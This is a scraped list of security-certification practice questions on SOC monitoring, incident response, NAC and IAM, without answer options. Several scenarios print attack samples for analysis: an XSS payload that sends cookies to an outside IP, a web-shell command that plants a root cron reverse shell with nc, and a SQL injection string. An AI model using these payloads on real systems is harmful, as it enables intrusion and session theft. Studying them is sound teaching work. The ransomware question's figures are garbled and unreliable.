All practice questions
2232 questions
A Security Operations Center (SOC) analyst is reviewing network monitoring telemetry and alert logs following an automated perimeter trigger. NetFlow records display an internal workstation (10.1.5.82) transferring 18 GB of outbound data over TCP port 443 to an unknown external destination (198.51.100.77) during off-hours. A deep packet inspection alert from the Network Intrusion Detection System (NIDS) flags the session payload format as encapsulated SSH rather than standard TLS. Additionally, an associated internal web application log displays the following incoming HTTP GET request parameter: `GET /profile?user=<script>window.location='http://198.51.100.77/log?c='+document.cookie</script> HTTP/1.1`. Which TWO of the following conclusions and monitoring actions are most accurate based on this evidence?
Select all that apply
A Security Operations Center (SOC) is designing a high-velocity Security Orchestration, Automation, and Response (SOAR) playbook to automatically mitigate risks when an active cloud API access key is detected in a public repository leak. To maintain service availability while ensuring rapid threat containment and contextual enrichment, which of the following response actions should be executed as automated steps without requiring manual human approval? (Select TWO.)
Select all that apply
An organization purchases a comprehensive cybersecurity insurance policy to cover financial liabilities associated with potential data breaches on its cloud servers. Which of the following risk response strategies is the organization demonstrating?
A security team managing an isolated air-gapped operational technology (OT) network discovers widespread configuration drift across engineering workstations during a compliance audit. Simultaneously, a critical zero-day vulnerability advisory requires immediate software updates on these systems. Which of the following procedures should the security team implement to remediate the configuration drift while safely deploying emergency security patches? (Select TWO).
Select all that apply
An organization is deploying a cluster of database servers that require continuous network connectivity at the host level. The infrastructure team must configure host network interfaces to survive an individual cable or switch port failure while simultaneously aggregating bandwidth across two interconnected access switches during normal operations. Which of the following networking mechanisms should the administrator implement to meet these requirements?
A financial systems workstation triggers a high-fidelity telemetry alert on an Endpoint Detection and Response (EDR) dashboard when a suspicious process attempts code injection into `explorer.exe` to establish a reverse connection. Which of the following initial actions should the incident response team perform using the EDR platform? (Select TWO.)
Select all that apply
A security engineer at a financial institution is reviewing a post-incident report for a critical web application server that was compromised. The investigation revealed that during an off-hours emergency software update, a vendor-supplied deployment script overwritten local system security parameters, reverting the server to an unhardened default baseline. Although the application vulnerability itself was successfully patched, administrative services were inadvertently exposed to the public network. Which of the following operational controls would best prevent this type of configuration drift during future patch deployments?
An incident response team is performing live forensic evidence acquisition on a cloud-hosted virtual machine suspected of being compromised during a data exfiltration attempt. Which of the following actions must the team perform to preserve evidence integrity and maintain a legally defensible chain of custody? (Select TWO.)
Select all that apply
A network security analyst reviews an intrusion detection alert showing an incoming HTTP GET request containing the payload `SELECT * FROM accounts WHERE user_id = '1' OR '1'='1'`. A analyst team member flags the alert as a Cross-Site Scripting (XSS) event. Which of the following best describes why this alert interpretation is incorrect?
A financial technology firm evaluates the potential impact of a ransomware incident on a database server valued at EF 20\% 0.20 SLE$) in dollars for this asset?
A security operations team is updating its vulnerability management strategy across diverse operational environments. Match each vulnerability scanning methodology on the left to the enterprise scenario on the right that best justifies its deployment.
Click a left item, then click its matching right item
Items
Matches
A security technician needs to conduct an internal vulnerability scan across local workstations to accurately audit operating system patch levels and local registry configurations while minimizing network traffic overhead. Which of the following scan methods should the technician select?
A security analyst in a SOC detects unauthorized PowerShell script execution originating from an HR department workstation that is actively communicating with an external command-and-control server. The analyst immediately isolates the workstation from the enterprise network using the EDR console. According to standard incident response frameworks, which of the following actions should the analyst perform NEXT?
During an incident investigation on a Linux developer workstation, a security analyst discovers that an attacker is running fileless malware directly within volatile memory using native utility process injection. Legacy antivirus software failed to trigger an alert because no file was written to the disk drive. Which of the following core capabilities of an Endpoint Detection and Response (EDR) platform allows it to detect and respond to this attack?
A security architect is designing an enterprise Network Access Control (NAC) architecture to secure corporate wired and wireless infrastructure. The design requires mutual authentication between client devices and the network, along with centralized authentication and authorization against the enterprise identity store. Which of the following components or protocols should be integrated to meet these requirements? (Select TWO.)
Select all that apply
A security operations analyst is investigating correlated SIEM log entries recorded from a Linux-based web server. The log management repository captured the following chronological event logs:
[Nginx Web Access Log]
192.168.10.45 - - [27/Jul/2026:11:14:02 +0000] "POST /uploads/avatar.php HTTP/1.1" 200 4522
192.168.10.45 - - [27/Jul/2026:11:14:15 +0000] "GET /uploads/avatar.php?cmd=whoami HTTP/1.1" 200 34
192.168.10.45 - - [27/Jul/2026:11:14:28 +0000] "GET /uploads/avatar.php?cmd=echo+%22%2A%2F5+%2A+%2A+%2A+%2A+root+nc+-e+%2Fbin%2Fbash+192.168.10.45+4444%22+%3E%3E+%2Fetc%2Fcrontab HTTP/1.1" 200 12
[Syslog / Cron Execution Log]
Jul 27 11:15:01 webserver CRON[4821]: (root) CMD (nc -e /bin/bash 192.168.10.45 4444)
Based on the log data, which of the following statements accurately describe the actions performed by the threat actor? (Select TWO.)
Select all that apply
A security administrator is auditing authentication and access logs from an enterprise remote access gateway for external contractors:
[2026-07-27 10:14:02] RADIUS-AUTH: User 'contractor_jb' LDAP authentication SUCCESS.
[2026-07-27 10:14:03] MFA-SVC: User 'contractor_jb' TOTP verification SUCCESS.
[2026-07-27 10:14:03] RADIUS-AUTH: Network Access Policy evaluation: User group 'Vendor-Temp' assigned VLAN 102.
[2026-07-27 10:14:05] RADIUS-AUTH: Authorization OVERRIDE: Local static table mapped 'contractor_jb' to 'Domain Admins' (VLAN 10).
[2026-07-27 10:14:06] VPN-GW: Session established for 'contractor_jb' with Administrative Privileges on VLAN 10.
Based on the log analysis, which of the following root causes and operational remediation actions are correct? (Select TWO.)
Select all that apply
A security analyst is establishing passive network security monitoring across a corporate local area network to monitor traffic without interrupting active host operations or injecting network probes. Which TWO of the following techniques represent passive network monitoring methods?
Select all that apply
An organization is updating its enterprise Identity and Access Management (IAM) architecture to reduce credential exposure and prevent lateral movement across server environments. The security architect needs to eliminate static, long-lived administrator credentials and ensure that elevated privileges are granted only on-demand for specific tasks and automatically revoked upon task completion. Which of the following IAM architectural strategies best fulfills this requirement?
An enterprise organization operating an immutable containerized infrastructure discovers a critical zero-day vulnerability in its base operating system image across multiple microservices. What is the correct chronological sequence of steps the security operations team must perform to remediate this vulnerability while maintaining configuration integrity and change control compliance?
Drag items to arrange them in the correct order